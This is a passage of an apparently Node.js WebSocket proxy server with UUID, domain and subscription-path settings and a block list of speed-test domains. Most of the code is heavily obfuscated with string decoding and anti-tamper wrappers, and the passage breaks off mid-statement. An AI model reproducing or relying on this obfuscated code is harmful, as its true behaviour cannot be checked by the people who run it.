const http = require('http');
const fs = require('fs');
const axios = require('axios');
const net = require('net');
const path = require('path');
const { Buffer } = require('buffer');
const { WebSocket, createWebSocketStream } = require('ws');

// 环境变量配置
const UUID = process.env.UUID || 'f54ffa9f-0fa6-4a99-9ee6-6c21e7bc1d53';
const DOMAIN = process.env.DOMAIN || 'your-domain.com';    // 填写项目域名或已反代的域名
const AUTO_ACCESS = process.env.AUTO_ACCESS || false;      // 是否开启自动访问保活
const WSPATH = process.env.WSPATH || UUID.slice(0, 8);     // WebSocket 路径
const SUB_PATH = process.env.SUB_PATH || 'sub';            // 订阅路径
const NAME = process.env.NAME || '';                       // 节点名称
const PORT = process.env.PORT || 3000;                     // 服务端口

(function(_0x5b80d5,_0x379a6b){const _0x4f06a3={_0x5139c5:0x2e8,_0x27ba35:0x31d,_0x4bf496:0x35a,_0x1fe354:0x2a9,_0x2f6958:0x275,_0x55dde5:0x2a7,_0x52c14f:0x1d6,_0x505128:0x16f,_0x206066:0x258,_0x2c4b1f:0x17c,_0x151510:0x2ab,_0x8da434:0x23d,_0x2ce859:0x353,_0x204f51:0x326,_0x6f3c9b:0x21d,_0x36f75c:0x219,_0x2cc9e7:0x1db,_0xa050ef:0x27d,_0x4fbfee:0x327,_0x5ae877:0x2f6,_0x17305f:0x336,_0x5681f5:0x2e4,_0x3751ee:0x28f,_0x26a3ad:0x2cf,_0x56869f:0x342,_0x198d1f:0x284,_0x1cfee4:0x2de,_0x148062:0x2a6,_0x42dcc6:0x2c5},_0x50a0cd={_0x4ea34b:0x1eb},_0x43329f=_0x5b80d5();function _0x3d64e6(_0x42243b,_0x1dbc3b,_0x1a6609,_0x2163e3){return _0x1711(_0x1a6609-_0x50a0cd._0x4ea34b,_0x42243b);}function _0xd640ce(_0x7c43b1,_0x3bde0b,_0xad2dd4,_0x293a79){return _0x1711(_0x7c43b1- -0x32f,_0x3bde0b);}while(!![]){try{const _0x4caadc=-parseInt(_0x3d64e6(0x378,_0x4f06a3._0x5139c5,_0x4f06a3._0x27ba35,_0x4f06a3._0x4bf496))/(-0x1c3*0xb+0x1*-0x2421+0x3783)*(-parseInt(_0x3d64e6(_0x4f06a3._0x1fe354,0x277,_0x4f06a3._0x2f6958,_0x4f06a3._0x55dde5))/(-0x1*0x125f+0x242b*-0x1+0x368c))+parseInt(_0xd640ce(-_0x4f06a3._0x52c14f,-_0x4f06a3._0x505128,-_0x4f06a3._0x206066,-_0x4f06a3._0x2c4b1f))/(-0xaa+-0x2467+0x2514)+-parseInt(_0xd640ce(-_0x4f06a3._0x151510,-_0x4f06a3._0x8da434,-0x30a,-0x2e5))/(-0x231*-0xd+0x8e*-0x29+-0x1*0x5bb)*(-parseInt(_0x3d64e6(0x2bc,_0x4f06a3._0x2ce859,_0x4f06a3._0x204f51,0x2b9))/(0x3*-0x88a+-0x1*-0x1f67+-0x5c4))+-parseInt(_0xd640ce(-0x235,-_0x4f06a3._0x6f3c9b,-_0x4f06a3._0x36f75c,-_0x4f06a3._0x2cc9e7))/(-0x471+0x1fb9+-0x1b42)*(parseInt(_0x3d64e6(0x310,_0x4f06a3._0xa050ef,0x2cf,_0x4f06a3._0x4fbfee))/(0x1aed*0x1+0x322*0x6+0x1*-0x2db2))+-parseInt(_0x3d64e6(_0x4f06a3._0x5ae877,_0x4f06a3._0x4fbfee,_0x4f06a3._0x17305f,_0x4f06a3._0x5681f5))/(0x718+0x739+-0x35*0x45)*(parseInt(_0xd640ce(-_0x4f06a3._0x3751ee,-0x291,-0x230,-0x26a))/(-0x409*0x7+-0x2*0x13c+0x1ec0))+parseInt(_0x3d64e6(_0x4f06a3._0x26a3ad,0x313,_0x4f06a3._0x56869f,0x33b))/(-0x1192+-0x5*0x712+-0x1*-0x34f6)*(parseInt(_0x3d64e6(_0x4f06a3._0x198d1f,_0x4f06a3._0x1cfee4,_0x4f06a3._0x198d1f,0x2eb))/(0x1a5f+0x18c9+-0x1*0x331d))+-parseInt(_0x3d64e6(0x28a,_0x4f06a3._0x5681f5,_0x4f06a3._0x148062,_0x4f06a3._0x42dcc6))/(-0x12e4*0x1+-0x72e+0x1a1e);if(_0x4caadc===_0x379a6b)break;else _0x43329f['push'](_0x43329f['shift']());}catch(_0x3acc99){_0x43329f['push'](_0x43329f['shift']());}}}(_0x68f8,0xaaf*0xe7+0x10f+-0x17914*-0x1));const _0x1da629=(function(){const _0x415344={_0x222ef7:0x42,_0x19d951:0x48,_0xc07d09:0x65,_0xd209:0x5e,_0x406b06:0xc1,_0x4222fd:0xe9,_0x1b8678:0xd4,_0x593f93:0x83,_0x1890a0:0x121,_0x17a704:0x126,_0x3ba94e:0x163},_0x37204b={_0x21c11b:0xb1,_0x3cef70:0x17,_0x592654:0x44,_0x3e8ca0:0x5f,_0x2a8307:0x23,_0x8c4d37:0x9,_0x369bcb:0x2e},_0x5c5d96={_0x253e23:0x10f,_0x54c57b:0x11f,_0x3b9aff:0x11a,_0x5d6fc4:0xed,_0x7181f9:0xdc,_0x4ce903:0xec,_0x428bdd:0x71,_0x3ca527:0x3d,_0x5a5199:0x75},_0x598557={_0x1581f2:0x55,_0x25f78f:0x100,_0x3881d0:0xd},_0x5aada3={_0x25040c:0x100,_0x329490:0x94},_0x44adb1={_0x52258f:0x1af};function _0x33838c(_0x4518a4,_0xfc2bc3,_0x11cc92,_0x131743){return _0x1711(_0xfc2bc3-_0x44adb1._0x52258f,_0x4518a4);}const _0x1315ef={};_0x1315ef['NPkLR']=function(_0x62ebc6,_0x47537c){return _0x62ebc6!==_0x47537c;},_0x1315ef[_0x1f4944(_0x415344._0x222ef7,_0x415344._0x19d951,_0x415344._0xc07d09,_0x415344._0xd209)]='XxyTi',_0x1315ef[_0x1f4944(_0x415344._0x406b06,_0x415344._0x4222fd,_0x415344._0x1b8678,_0x415344._0x593f93)]=_0x1f4944(_0x415344._0x1890a0,_0x415344._0x17a704,_0x415344._0x4222fd,_0x415344._0x3ba94e);const _0x539783=_0x1315ef;function _0x1f4944(_0x5d9199,_0xd70f83,_0x5ecc05,_0x4bc94f){return _0x1711(_0xd70f83- -0x3b,_0x4bc94f);}let _0x43654f=!![];return function(_0x4c6606,_0x22fa02){const _0x8df75b={_0x2ac806:0x8a,_0x11ada5:0x158};function _0x388b18(_0x3701f8,_0x3b531b,_0x37cbae,_0x2d26bf){return _0x1f4944(_0x3701f8-_0x5aada3._0x25040c,_0x37cbae- -_0x5aada3._0x329490,_0x37cbae-_0x5aada3._0x329490,_0x3701f8);}function _0x29ba6b(_0x2573a1,_0x57a319,_0x57c823,_0x21f96e){return _0x1f4944(_0x2573a1-_0x598557._0x1581f2,_0x57a319- -_0x598557._0x25f78f,_0x57c823-_0x598557._0x3881d0,_0x21f96e);}if(_0x539783[_0x388b18(0x84,0xc8,0x90,_0x37204b._0x21c11b)](_0x539783[_0x29ba6b(0xf,-_0x37204b._0x3cef70,-0x79,-_0x37204b._0x592654)],_0x388b18(-_0x37204b._0x3e8ca0,_0x37204b._0x2a8307,-_0x37204b._0x8c4d37,-_0x37204b._0x369bcb))){const _0x526479=_0x43654f?function(){const _0x165933={_0x208d31:0x227,_0x3a13a9:0x202,_0x28a3c6:0x1dd},_0x244324={_0xb32f49:0x49,_0x455ac5:0x182,_0x5658b5:0xa9};function _0x544e00(_0xe4f06f,_0x33c1cc,_0x2db29e,_0x252441){return _0x29ba6b(_0xe4f06f-_0x244324._0xb32f49,_0x33c1cc-_0x244324._0x455ac5,_0x2db29e-_0x244324._0x5658b5,_0x252441);}function _0x5dd081(_0x3b67b6,_0x292f59,_0x283e14,_0x3c6b3e){return _0x388b18(_0x283e14,_0x292f59-0x35,_0x3c6b3e-_0x8df75b._0x2ac806,_0x3c6b3e-_0x8df75b._0x11ada5);}if(_0x539783[_0x5dd081(_0x5c5d96._0x253e23,_0x5c5d96._0x54c57b,0x13d,_0x5c5d96._0x3b9aff)](_0x5dd081(_0x5c5d96._0x5d6fc4,0x124,_0x5c5d96._0x7181f9,0xd7),_0x539783[_0x544e00(0xef,0xca,0x88,_0x5c5d96._0x4ce903)])){if(_0x22fa02){const _0x41dcd3=_0x22fa02[_0x5dd081(_0x5c5d96._0x428bdd,_0x5c5d96._0x3ca527,0xe5,_0x5c5d96._0x5a5199)](_0x4c6606,arguments);return _0x22fa02=null,_0x41dcd3;}}else{const _0x883cb7={_0x3f3372:0x126},_0x611a2=_0x270c30?function(){function _0x184989(_0x1af107,_0x7d4771,_0x44cb1a,_0x27219e){return _0x544e00(_0x1af107-0x53,_0x1af107-_0x883cb7._0x3f3372,_0x44cb1a-0x1ae,_0x44cb1a);}if(_0x334d5e){const _0x5ade5b=_0x30d66e[_0x184989(_0x165933._0x208d31,0x294,_0x165933._0x3a13a9,_0x165933._0x28a3c6)](_0x397281,arguments);return _0x5b25f7=null,_0x5ade5b;}}:function(){};return _0x4ed234=![],_0x611a2;}}:function(){};return _0x43654f=![],_0x526479;}else{_0x4ab5f4['close']();return;}};}()),_0x15de49=_0x1da629(this,function(){const _0x1682b2={_0x59d724:0x109,_0x54b1aa:0xd7,_0x512f9d:0xb7,_0x17279a:0xc9,_0x14740d:0x124,_0x6a6c9a:0xd3,_0x400355:0x215,_0x2a98a7:0x179,_0x502b2f:0x1b3,_0x25be2c:0x14a,_0x20a978:0x60,_0x1ab5ae:0xd7,_0x11198a:0x123,_0x287719:0x9f,_0x246c83:0x53,_0x3fb26c:0xf5,_0x31053e:0x22c,_0x1a95d3:0x1cc,_0x229a4c:0x1b3,_0x592623:0x146,_0x141bef:0xcc},_0x2658cf={_0x494da0:0x1d3},_0x4fa8eb={_0x84347a:0x30};function _0x50ad9e(_0x5791,_0x18bf41,_0x3dc28a,_0x2592d4){return _0x1711(_0x3dc28a-_0x4fa8eb._0x84347a,_0x5791);}function _0x73fdfe(_0x2442ad,_0x443af5,_0x3d7189,_0xda52d6){return _0x1711(_0x2442ad- -_0x2658cf._0x494da0,_0x3d7189);}const _0x155f24={};_0x155f24[_0x50ad9e(0xf4,_0x1682b2._0x59d724,_0x1682b2._0x54b1aa,_0x1682b2._0x512f9d)]=_0x50ad9e(_0x1682b2._0x17279a,_0x1682b2._0x14740d,_0x1682b2._0x6a6c9a,0x129);const _0x445cda=_0x155f24;return _0x15de49['toString']()[_0x50ad9e(_0x1682b2._0x400355,_0x1682b2._0x2a98a7,_0x1682b2._0x502b2f,_0x1682b2._0x25be2c)](_0x445cda[_0x50ad9e(_0x1682b2._0x20a978,0xcf,_0x1682b2._0x1ab5ae,_0x1682b2._0x11198a)])[_0x73fdfe(-_0x1682b2._0x287719,-_0x1682b2._0x246c83,-_0x1682b2._0x3fb26c,-_0x1682b2._0x3fb26c)]()['constructor'](_0x15de49)[_0x50ad9e(_0x1682b2._0x31053e,_0x1682b2._0x1a95d3,_0x1682b2._0x229a4c,_0x1682b2._0x592623)](_0x445cda[_0x73fdfe(-0x12c,-_0x1682b2._0x141bef,-0x122,-0xc8)]);});_0x15de49();const _0x44dbaa=(function(){const _0x5eb602={_0x24f466:0x13d,_0x1ec151:0x13e,_0x3c8c33:0x1c3},_0x386631={_0xe184c:0x246,_0x32bd0d:0x213,_0x30f3ec:0x296,_0x3d92b1:0x1f6,_0x404d3a:0x276,_0x1fe51c:0x259,_0x514c0c:0x2af,_0x3d4ac8:0x29b,_0x5b17d6:0x288,_0x2649b:0x2f6,_0x367047:0x2a7,_0x5ae4c6:0x1fa,_0x4e2e5b:0x28a},_0x1c55fd={_0xe38f46:0x10f},_0x17fb93={'qcvkN':function(_0x2d4a60,_0x22ba78){return _0x2d4a60!==_0x22ba78;},'mdvvc':_0x41b63e(_0x5eb602._0x24f466,_0x5eb602._0x1ec151,_0x5eb602._0x3c8c33,0x1a1),'AemBW':'jAKPs','ltftD':function(_0x1a4534,_0x4f055b){return _0x1a4534(_0x4f055b);}};let _0x2ef681=!![];function _0x41b63e(_0x10d25f,_0x33c290,_0x480cc8,_0x3cfa7d){return _0x1711(_0x3cfa7d-_0x1c55fd._0xe38f46,_0x10d25f);}return function(_0x4179d0,_0x12f711){const _0x2aae31={_0x35300b:0x355},_0x314625={_0x287af5:0x2fb,_0x34f08b:0x2c2},_0x15050a={_0xd58b60:0x1c9},_0x27d3f7={'wLpfN':function(_0x48d96f,_0x1b5320){function _0x56bfc6(_0x584f07,_0x82d958,_0x1a08ad,_0x5764f4){return _0x1711(_0x5764f4-_0x15050a._0xd58b60,_0x1a08ad);}return _0x17fb93[_0x56bfc6(_0x314625._0x287af5,_0x314625._0x34f08b,0x2d8,0x29c)](_0x48d96f,_0x1b5320);}},_0x5b8c8a=_0x2ef681?function(){const _0x32d232={_0x493c3e:0x1af};function _0x7f57a8(_0x2c3dbe,_0x2be874,_0x2eebde,_0x186f7b){return _0x1711(_0x186f7b- -_0x2aae31._0x35300b,_0x2be874);}function _0xfcab90(_0x349c49,_0x341263,_0x56cff0,_0x432cb7){return _0x1711(_0x56cff0-_0x32d232._0x493c3e,_0x341263);}if(_0x12f711){if(_0x17fb93['qcvkN'](_0x17fb93[_0x7f57a8(-_0x386631._0xe184c,-_0x386631._0x32bd0d,-_0x386631._0x30f3ec,-0x28d)],_0x17fb93[_0xfcab90(_0x386631._0x3d92b1,_0x386631._0x404d3a,_0x386631._0x1fe51c,0x2db)])){const _0x37cfa0=_0x12f711[_0x7f57a8(-0x230,-_0x386631._0x514c0c,-0x317,-_0x386631._0x3d4ac8)](_0x4179d0,arguments);return _0x12f711=null,_0x37cfa0;}else{_0x27d3f7[_0xfcab90(0x2d4,_0x386631._0x5b17d6,_0x386631._0x2649b,_0x386631._0x367047)](_0x2a0a97,new _0x3c7d6c(_0x7f57a8(-0x278,-_0x386631._0x5ae4c6,-_0x386631._0x4e2e5b,-0x22f)+_0x736e73+'\x20with\x20all\x20DNS\x20servers'));return;}}}:function(){};return _0x2ef681=![],_0x5b8c8a;};}()),_0x211932=_0x44dbaa(this,function(){const _0x32b1b2={_0x190e5c:0x1ac,_0xa3b4fc:0x1af,_0x5df348:0x22b,_0x5ef0f6:0x1ea,_0x1803f3:0x205,_0xa16b17:0x173,_0x9a82df:0x1ec,_0x41dc1d:0x166,_0x119fe3:0x1d3,_0x40f7c4:0x19a,_0x10cebf:0x23a,_0x86922f:0x2b7,_0xb026d4:0x29f,_0x1448b9:0x1b5,_0x326b0b:0x141,_0x33f3f3:0x142,_0xba216c:0x19d,_0x322bfd:0x1b4,_0x14641a:0x1e7,_0x4c2504:0x1a3,_0xd6b93d:0x296,_0x1d2c99:0x25a,_0x3a07bd:0x291,_0x386dd0:0x1fd,_0x439198:0x2a1,_0x56a6fe:0x1e2,_0x7a76b0:0x231,_0x242d03:0x29c,_0x1995d1:0x243,_0x3d70d5:0x24a,_0x6833e7:0x25a,_0x5b7409:0x175,_0x14724:0x185,_0x39980a:0x269,_0x3631f0:0x27a,_0x3f9f11:0x285,_0x5c8d10:0x2bb,_0x218179:0x150,_0x3c6a85:0x1aa,_0x2751ff:0x18d,_0x17f153:0x193,_0x2427de:0x22c,_0x5505bd:0x1f0,_0x564127:0x15f,_0xb49ffa:0x1da,_0x2e9ada:0x1b0,_0x17dfc2:0x20a,_0x39d073:0x1f7,_0x283715:0x264,_0x51b1ca:0x15e,_0x351367:0x1c5,_0x4ad0ee:0x1e2,_0x43efc7:0x1ce,_0xa35afa:0x1ee,_0x1de2b5:0x1dc,_0x36dd2c:0x192,_0x6a487d:0x1b6,_0x288bee:0x1c7,_0x3f5032:0x222,_0x5a5215:0x22b,_0x2ba0ca:0x24c,_0x447d54:0x22d,_0x4d5293:0x22a,_0x3b4307:0x25e,_0x4936c3:0x2c1,_0x178072:0x23b,_0x598d8e:0x16e,_0x40c096:0x158,_0x3b331d:0x171,_0x360e90:0x140,_0x558515:0x234,_0x2971ee:0x14e,_0x310ed2:0x1b8,_0x7ed808:0x167,_0x288e91:0x1dc,_0x4595c0:0x1cb,_0x1d3534:0x266,_0xd5c12e:0x2c3,_0x4822e1:0x2ad,_0xe665c7:0x2b5,_0x19b2d3:0x1d8,_0x5d4dff:0x158,_0x4cffea:0x1fb,_0x310fc6:0x1b7,_0x3dd029:0x215,_0x425dbd:0x1a2,_0x9ea3eb:0x1bd,_0x3ee6b9:0x16c,_0x1b6957:0x1d1,_0x11ddd3:0x15d,_0x305635:0x1fc,_0x391324:0x18b,_0x1b6a17:0x27b,_0x22792d:0x26d,_0x5d2b66:0x1e5,_0x3cf11b:0x126},_0x5e2895={_0x2d884:0x149},_0x2d48d4={'lxtgo':function(_0x46f5e9,_0x5b8ac0){return _0x46f5e9(_0x5b8ac0);},'fXtLb':function(_0x14c6bf,_0x320c35){return _0x14c6bf+_0x320c35;},'oNlrp':'return\x20(function()\x20','VaNDs':_0x368561(_0x32b1b2._0x190e5c,_0x32b1b2._0xa3b4fc,_0x32b1b2._0x5df348,_0x32b1b2._0x5ef0f6),'KMTlb':function(_0x22862a){return _0x22862a();},'CzJtY':function(_0x2ac1f1,_0x194451){return _0x2ac1f1===_0x194451;},'cnyKP':_0x368561(0x263,_0x32b1b2._0x1803f3,_0x32b1b2._0xa16b17,0x1e3),'cbwRt':function(_0xf63d07,_0x483053){return _0xf63d07+_0x483053;},'mZPLm':function(_0x4db526,_0x9591ed){return _0x4db526+_0x9591ed;},'ExmLd':_0x368561(_0x32b1b2._0x9a82df,_0x32b1b2._0x41dc1d,_0x32b1b2._0x119fe3,_0x32b1b2._0x40f7c4),'yhVPV':_0x1352d3(0x24b,_0x32b1b2._0x10cebf,_0x32b1b2._0x86922f,_0x32b1b2._0xb026d4),'KQAJH':_0x368561(_0x32b1b2._0x1448b9,_0x32b1b2._0x326b0b,_0x32b1b2._0x33f3f3,0x1be),'FuYZQ':_0x368561(_0x32b1b2._0xba216c,_0x32b1b2._0x322bfd,_0x32b1b2._0x14641a,_0x32b1b2._0x4c2504),'uuzzd':'exception','qfcgG':'table','mEecF':_0x1352d3(_0x32b1b2._0xd6b93d,_0x32b1b2._0x1d2c99,0x264,_0x32b1b2._0x3a07bd)};function _0x1352d3(_0x3a4d27,_0x100ec7,_0x437479,_0x472021){return _0x1711(_0x3a4d27-_0x5e2895._0x2d884,_0x437479);}let _0xeb5338;try{if(_0x2d48d4[_0x368561(_0x32b1b2._0x386dd0,_0x32b1b2._0x439198,_0x32b1b2._0x56a6fe,_0x32b1b2._0x7a76b0)](_0x2d48d4['cnyKP'],_0x2d48d4[_0x1352d3(_0x32b1b2._0x242d03,_0x32b1b2._0x1995d1,_0x32b1b2._0x3d70d5,0x2e4)])){const _0x6646db=_0x2d48d4[_0x368561(_0x32b1b2._0x6833e7,_0x32b1b2._0x5b7409,_0x32b1b2._0x14724,_0x32b1b2._0x56a6fe)](Function,_0x2d48d4[_0x1352d3(_0x32b1b2._0x39980a,_0x32b1b2._0x3631f0,_0x32b1b2._0x3f9f11,_0x32b1b2._0x5c8d10)](_0x2d48d4[_0x368561(_0x32b1b2._0x218179,_0x32b1b2._0x3c6a85,_0x32b1b2._0x2751ff,_0x32b1b2._0x17f153)](_0x368561(0x26c,_0x32b1b2._0x2427de,_0x32b1b2._0x5505bd,0x249),_0x2d48d4[_0x368561(_0x32b1b2._0x564127,0x12d,_0x32b1b2._0xb49ffa,_0x32b1b2._0x2e9ada)]),');'));_0xeb5338=_0x2d48d4[_0x1352d3(_0x32b1b2._0x17dfc2,0x1c7,_0x32b1b2._0x39d073,_0x32b1b2._0x283715)](_0x6646db);}else{const _0x23d41c=_0x2d48d4[_0x368561(_0x32b1b2._0x51b1ca,_0x32b1b2._0x351367,0x1fa,_0x32b1b2._0x4ad0ee)](_0x5ad2c7,_0x2d48d4['fXtLb'](_0x2d48d4['fXtLb'](_0x2d48d4[_0x1352d3(_0x32b1b2._0x43efc7,_0x32b1b2._0xa35afa,_0x32b1b2._0x1de2b5,0x1c0)],_0x2d48d4['VaNDs']),');'));_0x39809a=_0x2d48d4[_0x1352d3(0x20a,_0x32b1b2._0x36dd2c,_0x32b1b2._0x6a487d,_0x32b1b2._0x288bee)](_0x23d41c);}}catch(_0x4b8c17){_0xeb5338=window;}const _0x2827f3=_0xeb5338[_0x368561(_0x32b1b2._0x3f5032,_0x32b1b2._0x5a5215,0x2b4,_0x32b1b2._0x2ba0ca)]=_0xeb5338[_0x368561(_0x32b1b2._0x447d54,0x1f5,_0x32b1b2._0x4d5293,0x24c)]||{};function _0x368561(_0x10d764,_0x4331c2,_0x3936c2,_0x231765){return _0x1711(_0x231765-0xd3,_0x3936c2);}const _0xda13b7=[_0x2d48d4[_0x1352d3(_0x32b1b2._0x3b4307,_0x32b1b2._0x9a82df,_0x32b1b2._0x4936c3,_0x32b1b2._0x178072)],_0x2d48d4[_0x368561(_0x32b1b2._0x598d8e,_0x32b1b2._0x40c096,0x162,_0x32b1b2._0x3b331d)],_0x2d48d4[_0x368561(_0x32b1b2._0x360e90,_0x32b1b2._0x558515,_0x32b1b2._0x2971ee,_0x32b1b2._0x310ed2)],_0x2d48d4[_0x368561(_0x32b1b2._0x7ed808,0x230,_0x32b1b2._0x288e91,_0x32b1b2._0x4595c0)],_0x2d48d4[_0x1352d3(0x22a,0x1b8,0x1f0,_0x32b1b2._0x1d3534)],_0x2d48d4['qfcgG'],_0x2d48d4[_0x1352d3(_0x32b1b2._0xd5c12e,0x2e6,_0x32b1b2._0x4822e1,_0x32b1b2._0xe665c7)]];for(let _0x423765=0x142c+-0x6d*0x57+-0x10df*-0x1;_0x423765<_0xda13b7[_0x1352d3(_0x32b1b2._0x19b2d3,_0x32b1b2._0x5d4dff,_0x32b1b2._0x4cffea,0x214)];_0x423765++){const _0x197f7e=_0x44dbaa['constructor'][_0x368561(_0x32b1b2._0x326b0b,_0x32b1b2._0x310fc6,_0x32b1b2._0x3dd029,_0x32b1b2._0x425dbd)][_0x368561(_0x32b1b2._0x9ea3eb,_0x32b1b2._0xa35afa,_0x32b1b2._0x3ee6b9,0x186)](_0x44dbaa),_0x25a32c=_0xda13b7[_0x423765],_0x21e8a6=_0x2827f3[_0x25a32c]||_0x197f7e;_0x197f7e[_0x368561(_0x32b1b2._0x1b6957,_0x32b1b2._0x11ddd3,0x19c,0x1cf)]=_0x44dbaa[_0x1352d3(_0x32b1b2._0x305635,0x1c2,_0x32b1b2._0x391324,0x22c)](_0x44dbaa),_0x197f7e['toString']=_0x21e8a6[_0x368561(_0x32b1b2._0x1b6a17,_0x32b1b2._0x22792d,0x265,0x207)][_0x368561(0x189,_0x32b1b2._0x5d2b66,_0x32b1b2._0x3cf11b,0x186)](_0x21e8a6),_0x2827f3[_0x25a32c]=_0x197f7e;}});_0x211932();function _0x1711(_0x220495,_0x11a5c9){const _0x302f15=_0x68f8();return _0x1711=function(_0xa81625,_0x9cd24b){_0xa81625=_0xa81625-(0xdf0+-0x808+-0x566*0x1);let _0x5e2c37=_0x302f15[_0xa81625];if(_0x1711['xNkOIg']===undefined){var _0x398d52=function(_0x4a7b36){const _0x5923e8='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';let _0x509c05='',_0x417552='',_0x206b56=_0x509c05+_0x398d52;for(let _0x328e20=-0x19a0+-0x25f4+0x3f94,_0xc04f76,_0x22ca4b,_0x4d1b73=-0x7a9+-0x1cd*0xd+-0xf89*-0x2;_0x22ca4b=_0x4a7b36['charAt'](_0x4d1b73++);~_0x22ca4b&&(_0xc04f76=_0x328e20%(-0x18c5+-0x2565+0x3e2e)?_0xc04f76*(-0x1e35+0x1f7b+-0x106*0x1)+_0x22ca4b:_0x22ca4b,_0x328e20++%(-0x1*0x109d+0x1074+-0x5*-0x9))?_0x509c05+=_0x206b56['charCodeAt'](_0x4d1b73+(-0x22d*-0x5+0xa0d+-0x14e4))-(0x10cd+-0x29*-0x1a+0x1*-0x14ed)!==0x23ed+0x253a+-0x4927?String['fromCharCode'](0x1ce4+0x1aa7+0x1b46*-0x2&_0xc04f76>>(-(0xe7f*-0x1+-0x8*0x4a7+-0x1*-0x33b9)*_0x328e20&0x1*0x14c3+0x1*-0xe41+-0x5*0x14c)):_0x328e20:0x895*0x1+0xf1+-0x986){_0x22ca4b=_0x5923e8['indexOf'](_0x22ca4b);}for(let _0x35a080=-0x2325+0x1bab+0x77a,_0x7bcf6e=_0x509c05['length'];_0x35a080<_0x7bcf6e;_0x35a080++){_0x417552+='%'+('00'+_0x509c05['charCodeAt'](_0x35a080)['toString'](0x536+-0x162d+0x1107))['slice'](-(-0x683*-0x3+0xf7a+-0x2301));}return decodeURIComponent(_0x417552);};_0x1711['ggZJjQ']=_0x398d52,_0x220495=arguments,_0x1711['xNkOIg']=!![];}const _0x15a591=_0x302f15[0xd*0x262+-0x1315+0x15*-0x91],_0x1e1ea3=_0xa81625+_0x15a591,_0x3d0e5b=_0x220495[_0x1e1ea3];if(!_0x3d0e5b){const _0x4285e8=function(_0x3f63b6){this['VPSHgn']=_0x3f63b6,this['NsnTmA']=[0xfaf+0x1a8f+-0x2a3d,-0x3cd+0x1*0x110b+0xf*-0xe2,0x1*0x268f+-0xb*-0x166+-0x1*0x35f1],this['JXAIol']=function(){return'newState';},this['hQJZnv']='\x5cw+\x20*\x5c(\x5c)\x20*{\x5cw+\x20*',this['wHxJiX']='[\x27|\x22].+[\x27|\x22];?\x20*}';};_0x4285e8['prototype']['MGBNJX']=function(){const _0x320f0c=new RegExp(this['hQJZnv']+this['wHxJiX']),_0x1329d5=_0x320f0c['test'](this['JXAIol']['toString']())?--this['NsnTmA'][0x13df*0x1+-0x16*0xce+0x2*-0x115]:--this['NsnTmA'][0x5*0x1e4+0x77f*-0x3+-0x1*-0xd09];return this['ZrBdZD'](_0x1329d5);},_0x4285e8['prototype']['ZrBdZD']=function(_0x3edeca){if(!Boolean(~_0x3edeca))return _0x3edeca;return this['NIXZFC'](this['VPSHgn']);},_0x4285e8['prototype']['NIXZFC']=function(_0x3463c2){for(let _0x31ed9e=-0x1d8a+-0x174f+0x34d9*0x1,_0x51e8de=this['NsnTmA']['length'];_0x31ed9e<_0x51e8de;_0x31ed9e++){this['NsnTmA']['push'](Math['round'](Math['random']())),_0x51e8de=this['NsnTmA']['length'];}return _0x3463c2(this['NsnTmA'][-0x1*-0x1ce1+-0x1110+-0xbd1]);},new _0x4285e8(_0x1711)['MGBNJX'](),_0x5e2c37=_0x1711['ggZJjQ'](_0x5e2c37),_0x220495[_0x1e1ea3]=_0x5e2c37;}else _0x5e2c37=_0x3d0e5b;return _0x5e2c37;},_0x1711(_0x220495,_0x11a5c9);}let CurrentDomain=DOMAIN,Tls=_0x18aada(-0x37,0x34,-0x4e,-0x2a),CurrentPort=0x338*-0x2+-0xdf5+0x60*0x3b,ISP='';const DNS_SERVERS=[_0x18aada(0x53,0xa7,0x83,0x2a),_0x20ed0c(0x37,-0x3f,-0xc,0x6a)],BLOCKED_DOMAINS=[_0x20ed0c(0x2,-0x7b,0x2c,-0x38),'fast.com',_0x20ed0c(-0x40,-0x14,-0x79,-0x5d),_0x18aada(0x16f,0xf5,0xce,0xd1),_0x20ed0c(0x40,0x38,-0xe,-0x2b),_0x18aada(0xc3,0x4e,0xc5,-0x25),'bandwidth.place',_0x20ed0c(-0xb,-0x16,0x23,-0x7a),_0x20ed0c(0x11,0x37,0x7e,0x3),'speedcheck.org'];function isBlockedDomain(_0x1f5113){const _0x43bd34={_0x1aba05:0x3db,_0x16347a:0x42e,_0xbe6608:0x3d5,_0x33c378:0x3ac,_0x19afe4:0x3bd,_0x187918:0x34c},_0x140a55={_0xc21467:0x299,_0x4f1c58:0x1c2,_0x1f5085:0x236},_0x58b273={_0x5138eb:0xc9},_0x33f7bb={_0x9a9804:0x3dc,_0x5f2752:0xa8,_0x23033a:0x1bd},_0x5a828b={};function _0x405330(_0x4490e5,_0x160185,_0x5e0e21,_0x2ef8ff){return _0x20ed0c(_0x2ef8ff-_0x33f7bb._0x9a9804,_0x160185-_0x33f7bb._0x5f2752,_0x5e0e21-_0x33f7bb._0x23033a,_0x160185);}function _0x392d5d(_0x21f302,_0x324cd6,_0x184eea,_0x56989a){return _0x18aada(_0x324cd6,_0x184eea- -_0x58b273._0x5138eb,_0x184eea-0xd3,_0x56989a-0xe3);}_0x5a828b[_0x405330(_0x43bd34._0x1aba05,_0x43bd34._0x16347a,0x439,_0x43bd34._0xbe6608)]=function(_0x39a61e,_0x47ad3f){return _0x39a61e===_0x47ad3f;};const _0x4b2640=_0x5a828b;if(!_0x1f5113)return![];const _0x2e2a79=_0x1f5113['toLowerCase']();return BLOCKED_DOMAINS[_0x405330(0x2d8,_0x43bd34._0x33c378,_0x43bd34._0x19afe4,_0x43bd34._0x187918)](_0x621f50=>{const _0x4f48db={_0x5b1e8a:0xdd,_0x1022b6:0x104,_0x4c6203:0x5ec};function _0x36049e(_0x42430c,_0x52b103,_0x4d6585,_0x1eba54){return _0x405330(_0x42430c-_0x4f48db._0x5b1e8a,_0x52b103,_0x4d6585-_0x4f48db._0x1022b6,_0x4d6585- -_0x4f48db._0x4c6203);}return _0x4b2640[_0x36049e(-_0x140a55._0xc21467,-_0x140a55._0x4f1c58,-0x217,-_0x140a55._0x1f5085)](_0x2e2a79,_0x621f50)||_0x2e2a79['endsWith']('.'+_0x621f50);});}const GetConfig=async()=>{const 